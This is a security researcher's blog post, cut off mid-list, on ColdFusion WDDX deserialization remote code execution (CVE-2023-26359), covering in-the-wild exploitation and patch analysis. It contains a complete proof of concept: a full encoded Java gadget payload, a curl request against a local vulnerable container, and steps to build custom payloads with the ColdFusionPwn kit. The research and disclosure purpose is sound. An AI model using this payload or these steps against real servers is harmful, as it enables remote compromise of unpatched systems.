<!DOCTYPE html>







<html lang="en"
  
    data-mode="dark"
  
>

  <!--
  The Head
-->

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  <!-- Allow having a localized datetime different from the appearance language -->
  

  

    

    

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.3.3" />
<meta property="og:title" content="ColdFusion RCE using WDDX deserialization - Story and details behind CVE-2023-26359 and CVE-2023-29300" />
<meta property="og:locale" content="en" />
<meta name="description" content="I would like to thank Patrick Vares for his tremendous help analyzing CVE-2023-26359 and its consequences" />
<meta property="og:description" content="I would like to thank Patrick Vares for his tremendous help analyzing CVE-2023-26359 and its consequences" />
<link rel="canonical" href="https://big5-sec.github.io/posts/ColdFusion-WDDX-2023/" />
<meta property="og:url" content="https://big5-sec.github.io/posts/ColdFusion-WDDX-2023/" />
<meta property="og:site_name" content="yar-eb" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2024-02-14T22:50:40+01:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="ColdFusion RCE using WDDX deserialization - Story and details behind CVE-2023-26359 and CVE-2023-29300" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2024-02-14T22:50:40+01:00","datePublished":"2024-02-14T22:50:40+01:00","description":"I would like to thank Patrick Vares for his tremendous help analyzing CVE-2023-26359 and its consequences","headline":"ColdFusion RCE using WDDX deserialization - Story and details behind CVE-2023-26359 and CVE-2023-29300","mainEntityOfPage":{"@type":"WebPage","@id":"https://big5-sec.github.io/posts/ColdFusion-WDDX-2023/"},"url":"https://big5-sec.github.io/posts/ColdFusion-WDDX-2023/"}</script>
<!-- End Jekyll SEO tag -->


  <title>ColdFusion RCE using WDDX deserialization - Story and details behind CVE-2023-26359 and CVE-2023-29300 | yar-eb
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">
<link rel="manifest" href="/assets/img/favicons/site.webmanifest">
<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="yar-eb">
<meta name="application-name" content="yar-eb">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  <!-- Google Fonts -->
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous">
  <link rel="dns-prefetch" href="https://fonts.gstatic.com">

  <!-- GA -->
  

  <!-- jsDelivr CDN -->
  <link rel="preconnect" href="https://cdn.jsdelivr.net">
  <link rel="dns-prefetch" href="https://cdn.jsdelivr.net">

  <!-- Bootstrap -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css">

  <!-- Font Awesome -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css">

  <!--
  CSS selector for site.
-->

<link rel="stylesheet" href="/assets/css/style.css">


  <link rel="stylesheet"
    href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css">



  <!-- Manific Popup -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1.1.0/dist/magnific-popup.min.css">



  <!-- JavaScript -->

  <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>

</head>


  <body data-spy="scroll" data-target="#toc" data-topbar-visible="true">

    <!--
  The Side Bar
-->

<div id="sidebar" class="d-flex flex-column align-items-end">
  <div class="profile-wrapper text-center">
    <div id="avatar">
      <a href="/" alt="avatar" class="mx-auto">
        
        
        <img src="
        
        /assets/avatar.jpg
        
        " alt="avatar" onerror="this.style.display='none'">
        
      </a>
    </div>

    <div class="site-title mt-3">
      <a href="/">yar-eb</a>
    </div>
    <div class="site-subtitle font-italic">Yet another reverse-engineer blog</div>

  </div><!-- .profile-wrapper -->

  <ul class="w-100">

    <!-- home -->
    <li class="nav-item">
      <a href="/" class="nav-link">
        <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i>
        <span>HOME</span>
      </a>
    </li>

    <!-- the real tabs -->
    


  </ul> <!-- ul.nav.flex-column -->

  <div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center">

    <!--  -->

    
    

    
    <a href="https://github.com/Big5-sec" aria-label="github" target="_blank" rel="noopener" >
      <i class="fab fa-github"></i>
    </a>
    

    
    

    
    <a href="/feed.xml" aria-label="rss" >
      <i class="fas fa-rss"></i>
    </a>
    

    

  </div> <!-- .sidebar-bottom -->

</div><!-- #sidebar -->

    <!--
  The Top Bar
-->

<div id="topbar-wrapper" class="row justify-content-center">
  <div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between">
    <span id="breadcrumb">

    

    

      

        
          <span>
            <a href="/">
              Home
            </a>
          </span>

        

      

        

      

        

          
            <span>ColdFusion RCE using WDDX deserialization - Story and details behind CVE-2023-26359 and CVE-2023-29300</span>
          

        

      

    

    </span><!-- endof #breadcrumb -->

    <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i>

    <div id="topbar-title">
      Post
    </div>

    <i id="search-trigger" class="fas fa-search fa-fw"></i>
    <span id="search-wrapper" class="align-items-center">
      <i class="fas fa-search fa-fw"></i>
      <input class="form-control" id="search-input" type="search"
        aria-label="search" autocomplete="off" placeholder="Search...">
      <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i>
    </span>
    <span id="search-cancel" >Cancel</span>
  </div>

</div>


    <div id="main-wrapper">
      <div id="main">

        



<div class="row">

  <!-- core -->
  <div id="core-wrapper" class="col-12 col-lg-11 col-xl-8">
    <div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4">

    

    
      
      
        <!--
  Refactor the HTML structure.
-->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Add attribute 'hide-bullet' to the checkbox list -->



<!-- images -->




  
  

  
    
      
      
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  

  



<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      
      

      

    
      

      
      

      
      
      
      

      

    
      

      
      

      
      
      
      

      

    
      

      
      

      
      
      
      

      

    

    

  

  
  

  

  
  

  

  
  

  




<!-- Wrap prompt element of blockquote with the <div> tag -->







<!-- return -->







<h1 data-toc-skip>ColdFusion RCE using WDDX deserialization - Story and details behind CVE-2023-26359 and CVE-2023-29300</h1>

<div class="post-meta text-muted">

  <!-- author -->
  <!-- <div>
    
    

    

    By
    <em>
      
        <a href="https://github.com/Big5-sec">Zilio Nicolas</a>
      
    </em>
  </div> -->

  <div class="d-flex">
    <div>
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
-->

<em class="timeago"
    data-ts="1707947440"
    
      data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll"
    
    >
  2024-02-14
</em>

      </span>

      <!-- lastmod date -->
      

      <!-- read time -->
      <!--
  Calculate the post's reading time, and display the word count in tooltip
 -->



<!-- words per minute  -->










<!-- return element -->
<span class="readtime" data-toggle="tooltip" data-placement="bottom"
  title="1956 words" style="vertical-align: sub;">
  <em>10 min</em> read</span>


      <!-- page views -->
      <!--  -->
    </div>

  </div> <!-- .d-flex -->

</div> <!-- .post-meta -->

<div class="post-content">
  <p><em>I would like to thank Patrick Vares for his tremendous help analyzing CVE-2023-26359 and its consequences</em></p>

<h1 id="wddx-deserialization-as-the-culprit-behind-these-vulnerabilities">WDDX Deserialization as the culprit behind these vulnerabilities</h1>

<p>A ColdFusion application is typically composed of ColdFusion Components (CFC) and ColdFusion templates (CFM), which are respectively implemented in <code class="language-plaintext highlighter-rouge">.cfc</code> or <code class="language-plaintext highlighter-rouge">.cfm</code> files. Templates offer webpage skeletons, with CFC forming the basic application building blocks. A CFC is similar to the concept of a “class” in object-oriented programming languages and offers methods that can be invoked either by CFML code present on the web server or remotely. [<a href="https://helpx.adobe.com/coldfusion/developing-applications/building-blocks-of-coldfusion-applications/building-and-using-coldfusion-components/using-coldfusion-components-developing-guide.html">reference 1</a>, <a href="https://helpx.adobe.com/coldfusion/developing-applications/building-blocks-of-coldfusion-applications/building-and-using-coldfusion-components/about-coldfusion-components.html">reference 2</a>]</p>

<p>All vulnerabilities discussed in this blog are rooted in a mechanism responsible for invoking CFC methods. For the rest of this paragraph, let’s consider a basic CFC method named mymethod—which requires two arguments named myarg1 and myarg2, and which is defined within the mycomponent.cfc file. This method can be invoked with the use of the special <code class="language-plaintext highlighter-rouge">argumentcollection</code> <a href="https://www.bennadel.com/blog/2053-using-an-argumentcollection-url-parameter-with-coldfusion-web-services.htm">ColdFusion parameter</a>, which can be used on a GET or POST request, and is essentially the list of parameters in serialized form. This serialized form can be in JavaScript Object Notation (JSON) or Web Distributed Data eXchange (WDDX) format—the latter being more of a XML legacy format still supported by ColdFusion.  The WDDX variant is the one of interest here. A typical invocation of the previously considered method through WDDX would be the following request:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>POST &lt;webpath&gt;/mycomponent.cfc?method=mymethod

argumentCollection=&lt;wddxPacket+version="1.0"&gt;&lt;header/&gt;&lt;data&gt;&lt;struct+type="coldfusion.runtime.ArgumentCollection"&gt;&lt;var+name='myarg1'&gt;&lt;string&gt;test&lt;/string&gt;&lt;/var&gt;&lt;var+name='myarg2'&gt;&lt;string&gt;test2&lt;/string&gt;&lt;/var&gt;&lt;/struct&gt;&lt;/data&gt;&lt;/wddxPacket&gt;
</pre></td></tr></tbody></table></code></div></div>

<p>In the previous request, a WDDX packet is defined, which contains a XML-based serialized coldfusion.runtime.ArgumentCollection class, for which two variables pertaining to our two arguments are defined. Upon reception of this request, ColdFusion will first decode any URL encoded characters in the HTTP body, and will then deserialize the contents of the WDDX packet.</p>

<p>Before CVE-2023-26359, no security checks were implemented to verify the incoming contents of the WDDX packet before deserialization. As a consequence, a malicious input could lead to RCE through crafted deserialization payloads, as already demonstrated by this <a href="https://blog.projectdiscovery.io/adobe-coldfusion-rce/">in-depth technical publication by ProjectDiscovery</a>.</p>

<h1 id="cve-2023-26359-was-exploited-as-a-0-day">CVE-2023-26359 was exploited as a 0-day</h1>

<p>At the start of year 2023, Coldfusion was the target of several exploitation campaigns as reported <a href="https://www.rapid7.com/blog/post/2023/03/21/etr-rapid7-observed-exploitation-of-adobe-coldfusion/">here</a> or <a href="https://www.bleepingcomputer.com/news/security/cisa-warns-of-adobe-coldfusion-bug-exploited-as-a-zero-day/">here</a>. At that time, thanks to my job at CrowdStrike, I analyzed those campaigns. Among the findings, I uncovered a first exploitation chain, <em>chain1</em>, that will be later labeled CVE-2023-26360. But against a single instance of a ColdFusion 2016 server which was exploited late February 2023, I was not able to retrieve the same <em>chain1</em> exploitation artifacts. Thanks to an accompanying WAF log, it was possible to retrieve partly what looked like the request used to exploit the server:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre>POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/filemanager.cfc?method=getfmfiles HTTP/1.1

Content-Type: application/x-www-form-urlencoded

argumentCollection=&lt;wddxPacket+version="1.0"&gt;&lt;header/&gt;&lt;data&gt;&lt;struct+type="Lorg.jgroups.blocks.ReplicatedTree;"&gt;&lt;var+name="state"&gt;&lt;binary+length='3301'&gt;AqztAAVzc[...]
</pre></td></tr></tbody></table></code></div></div>

<p>An analysis of this request led to the conclusion that exploitation of a deserialization vulnerability was likely and that a second exploitation chain, <em>chain2</em>, is used to get initial access to these targeted ColdFusion servers. However, initial reproduction attempts of <em>chain2</em> (I was personally trying to get some sort of error message by providing a well-formed yet incomplete request) against a ColdFusion 2021 instance were unsuccessful. At first, the conclusion was that <em>chain1</em> and <em>chain2</em> exploitation chains were part of the same exploitation campaign, where <em>chain2</em> was used to target ColdFusion 2016 instances and <em>chain1</em> was used to target ColdFusion 2018 and above instances. As ColdFusion 2016 reached end-of-life support, it was hypothesized <em>chain2</em> was leveraging an old vulnerability; hence no need to investigate further.</p>

<p>On 14th March 2023, Adobe released a <a href="https://helpx.adobe.com/security/products/coldfusion/apsb23-25.html">security update for Coldfusion</a>, detailing two different vulnerabilities, CVE-2023-26360 and CVE-2023-26359, both affecting ColdFusion 2018 and ColdFusion 2021. The first one was labeled as an improper access and the second one being a deserialization vulnerability. Upon analysis of a ColdFusion 2021 patch, I came to the following conclusions (ref to Rapid7 analysis):</p>

<ul>
  <li><a href="https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis">addition of the variable <code class="language-plaintext highlighter-rouge">allowNonCFCDeserialization</code></a> pertained to CVE-2023-26359</li>
  <li><a href="https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis">additional checks introduced in <code class="language-plaintext highlighter-rouge">coldfusion.runtime.TemplateProxyFactory.resolveFile</code> pertained to CVE-2023-26360</a></li>
</ul>

<p>Hence, I concluded that the two vulnerabilities were in fact associated with the same <em>chain1</em> previously reported, as a means for Adobe to better track code changes.</p>

<p>However, on 12th April 2023, Adobe modified the security bulletin by stating that CVE-2023-26360 is a deserialization vulnerability as well. From then, the previous conclusions had been rendered inconclusive. Indeed, all modifications were pertaining to the exploitation chain <em>chain1</em>, and only one of the code modifications was tied to a deserialization problem. To figure it out, I contacted original reporters of both CVE-2023-26360 and CVE-2023-26359, Charlie Arehart and Patrick Vares, who were both kind enough to provide some details.</p>

<p>Based on those details, I was able to come up with the following conclusions:</p>

<ul>
  <li><em>chain1</em> was tied to CVE-2023-26360</li>
  <li><em>chain2</em> was tied to CVE-2023-26359</li>
  <li><strong>CVE-2023-26359 was used as a 0day</strong>. And Patrick Vares who reported it actually did so after a thorough and nice investigation of two compromised ColdFusion servers. As of this writing, Adobe refused to indicate this in their bulletins, and I do believe the inclusion of CVE-2023-26359 in CISA KEV list was done after CrowdStrike reporting.</li>
  <li><strong>All code changes in ColdFusion 2021 patch were pertaining to CVE-2023-26360. Somehow, CVE-2023-26359 is intact there.</strong></li>
</ul>

<h1 id="cve-2023-26359-details">CVE-2023-26359 details</h1>

<h2 id="analysis">Analysis <a href="#analysis" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2>

<p>I won’t describe in much details the inner workings of the WDDX deserialization vulnerability occuring here, as <a href="https://blog.projectdiscovery.io/adobe-coldfusion-rce/">ProjectDiscovery already did</a>. Let’s have a simple look at the ITW exploit instead:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre>POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/filemanager.cfc?method=getfmfiles HTTP/1.1

Content-Type: application/x-www-form-urlencoded

argumentCollection=&lt;wddxPacket+version="1.0"&gt;&lt;header/&gt;&lt;data&gt;&lt;struct+type="Lorg.jgroups.blocks.ReplicatedTree;"&gt;&lt;var+name="state"&gt;&lt;binary+length='3301'&gt;AqztAAVzc[...]&lt;/binary&gt;&lt;/var&gt;&lt;/struct&gt;&lt;/data&gt;&lt;/wddxPacket&gt;
</pre></td></tr></tbody></table></code></div></div>

<p>Here, when the WDDX request contents are deserialized through the <code class="language-plaintext highlighter-rouge">WDDXDeserialize</code> function, a <code class="language-plaintext highlighter-rouge">ReplicatedTree</code> class is first instantiated, followed by the <code class="language-plaintext highlighter-rouge">state</code> parameter of the <code class="language-plaintext highlighter-rouge">ReplicatedTree</code> class being set through the <code class="language-plaintext highlighter-rouge">setState</code> method. This method calls the <code class="language-plaintext highlighter-rouge">jgroup</code>’s <code class="language-plaintext highlighter-rouge">Util.objectFromByteBuffer</code> method, which will consider the value passed for the state parameter as an ObjectInputStream and will call the <code class="language-plaintext highlighter-rouge">readObject</code> method on the value of this <code class="language-plaintext highlighter-rouge">state</code> parameter. People used to Java deserialization are gonna immediately recognize this to be a pattern commonly found in deserialization gadgets. In fact, this gadget chain was very similar to a previous exploit chain targeting Coldfusion and explained in one of <a href="https://codewhitesec.blogspot.com/2018/03/exploiting-adobe-coldfusion.html">CodeWhiteSec’s blog</a> (also used in their <a href="https://github.com/codewhitesec/ColdFusionPwn/tree/master">ColdFusionPwn tool</a>). In the end, full RCE is directly obtained, with the rights of the user running the ColdFusion server.</p>

<h2 id="poc">POC <a href="#poc" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2>

<p>The following reproduction steps demonstrate how to use CVE-2023-26359 to create a “foo” file within the <code class="language-plaintext highlighter-rouge">/tmp</code> directory of a vulnerable ColdFusion 2018:</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre>$ docker run -dt -p "8500:8500" --env "acceptEULA=YES" --env "password=admin" --env "deploymentType=Production" --env "allowedAdminIPList=*.*.*.*,0.0.0.0" --name cf_test adobecoldfusion/coldfusion2018:2018.0.15

$ echo "argumentCollection=%3CwddxPacket+version%3D%271.0%27%3E%3Cheader%2F%3E%3Cdata%3E%3Cstruct+type%3D%27Lorg.jgroups.blocks.ReplicatedTree%3B%27%3E%3Cvar+name%3D%27state%27%3E%3Cbinary+length%3D%273292%27%3EAqztAAVzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAACAAAAAnNyAChjb20uc3VuLnN5bmRpY2F0aW9uLmZlZWQuaW1wbC5PYmplY3RCZWFugpkH3nYElEoCAANMAA5fY2xvbmVhYmxlQmVhbnQALUxjb20vc3VuL3N5bmRpY2F0aW9uL2ZlZWQvaW1wbC9DbG9uZWFibGVCZWFuO0wAC19lcXVhbHNCZWFudAAqTGNvbS9zdW4vc3luZGljYXRpb24vZmVlZC9pbXBsL0VxdWFsc0JlYW47TAANX3RvU3RyaW5nQmVhbnQALExjb20vc3VuL3N5bmRpY2F0aW9uL2ZlZWQvaW1wbC9Ub1N0cmluZ0JlYW47eHBzcgArY29tLnN1bi5zeW5kaWNhdGlvbi5mZWVkLmltcGwuQ2xvbmVhYmxlQmVhbvU%2FP7HRRzl4AgACTAARX2lnbm9yZVByb3BlcnRpZXN0AA9MamF2YS91dGlsL1NldDtMAARfb2JqdAASTGphdmEvbGFuZy9PYmplY3Q7eHBzcgAeamF2YS51dGlsLkNvbGxlY3Rpb25zJEVtcHR5U2V0FfVyHbQDyygCAAB4cHNxAH4AAnNxAH4AB3EAfgAMc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0%2FBbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAEV9vdXRwdXRQcm9wZXJ0aWVzdAAWTGphdmEvdXRpbC9Qcm9wZXJ0aWVzO3hwAAAAAP%2F%2F%2F%2F91cgADW1tCS%2F0ZFWdn2zcCAAB4cAAAAAJ1cgACW0Ks8xf4BghU4AIAAHhwAAAGosr%2Bur4AAAAyADkKAAMAIgcANwcAJQcAJgEAEHNlcmlhbFZlcnNpb25VSUQBAAFKAQANQ29uc3RhbnRWYWx1ZQWtIJPzkd3vPgEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQATU3R1YlRyYW5zbGV0UGF5bG9hZAEADElubmVyQ2xhc3NlcwEANUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJFN0dWJUcmFuc2xldFBheWxvYWQ7AQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHACcBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEAClNvdXJjZUZpbGUBAAxHYWRnZXRzLmphdmEMAAoACwcAKAEAM3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAH3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMBAAg8Y2xpbml0PgEAEWphdmEvbGFuZy9SdW50aW1lBwAqAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwALAAtCgArAC4BAA50b3VjaCAvdG1wL2ZvbwgAMAEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsMADIAMwoAKwA0AQANU3RhY2tNYXBUYWJsZQEAHXlzb3NlcmlhbC9Qd25lcjY3MzkzNzkyNzY4NDc5AQAfTHlzb3NlcmlhbC9Qd25lcjY3MzkzNzkyNzY4NDc5OwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAAC8ADgAAAAwAAQAAAAUADwA4AAAAAQATABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAADQADgAAACAAAwAAAAEADwA4AAAAAAABABUAFgABAAAAAQAXABgAAgAZAAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAAADgADgAAACoABAAAAAEADwA4AAAAAAABABUAFgABAAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAACQAAwACAAAAD6cAAwFMuAAvEjG2ADVXsQAAAAEANgAAAAMAAQMAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACXVxAH4AFwAAAdTK%2Frq%2BAAAAMgAbCgADABUHABcHABgHABkBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFceZp7jxtRxgBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAA0ZvbwEADElubmVyQ2xhc3NlcwEAJUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbzsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHABoBACN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbwEAEGphdmEvbGFuZy9PYmplY3QBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAH3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAEAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAA8AA4AAAAMAAEAAAAFAA8AEgAAAAIAEwAAAAIAFAARAAAACgABAAIAFgAQAAlwdAAEUHducnB3AQB4c3IAKGNvbS5zdW4uc3luZGljYXRpb24uZmVlZC5pbXBsLkVxdWFsc0JlYW7Oh8tx5AASNAIAAkwACl9iZWFuQ2xhc3N0ABFMamF2YS9sYW5nL0NsYXNzO0wABF9vYmpxAH4ACXhwdnIAHWphdmF4LnhtbC50cmFuc2Zvcm0uVGVtcGxhdGVzAAAAAAAAAAAAAAB4cHEAfgAUc3IAKmNvbS5zdW4uc3luZGljYXRpb24uZmVlZC5pbXBsLlRvU3RyaW5nQmVhblqODySJr%2FvtAgACTAAKX2JlYW5DbGFzc3EAfgAcTAAEX29ianEAfgAJeHBxAH4AH3EAfgAUc3EAfgAbdnEAfgACcQB%2BAA1zcQB%2BACBxAH4AI3EAfgANcQB%2BAAZxAH4ABnEAfgAGeA%3D%3D%3C%2Fbinary%3E%3C%2Fvar%3E%3C%2Fstruct%3E%3C%2Fdata%3E%3C%2FwddxPacket%3E" &gt; payload

$ curl -XPOST --data "@payload" http://localhost:8500/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/filemanager.cfc?method=getfmfiles

$ docker exec -it cf_test ls /tmp
</pre></td></tr></tbody></table></code></div></div>

<p>So the real question: “how to create your own payload”. I’ll leave the reader with these reproduction steps from Patrick Vares, who once again did an outstanding job here:</p>

<ol>
  <li>Resurrect the <code class="language-plaintext highlighter-rouge">ColdFusionPwn</code> exploit kit but modify it so the output is WDDX serialized. To ensure the payload is compatible with the targeted ColdFusion version, use the ColdFusion’s own WDDX serializer:
    <ul>
      <li>add <code class="language-plaintext highlighter-rouge">cfusion.jar</code> as a library dependency for building and executing the exploit kit.</li>
      <li>
        <p>modify the project to output Wddx:</p>

        <div class="language-java highlighter-rouge"><div class="code-header">
        <span data-label-text="Java"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre> <span class="kn">import</span> <span class="nn">coldfusion.rds.WddxUtils</span><span class="o">;</span>
  
 <span class="nc">String</span> <span class="n">content</span> <span class="o">=</span> <span class="nc">WddxUtils</span><span class="o">.</span><span class="na">writeObject</span><span class="o">(</span><span class="n">payload</span><span class="o">);</span>
</pre></td></tr></tbody></table></code></div>        </div>
      </li>
    </ul>
  </li>
  <li>
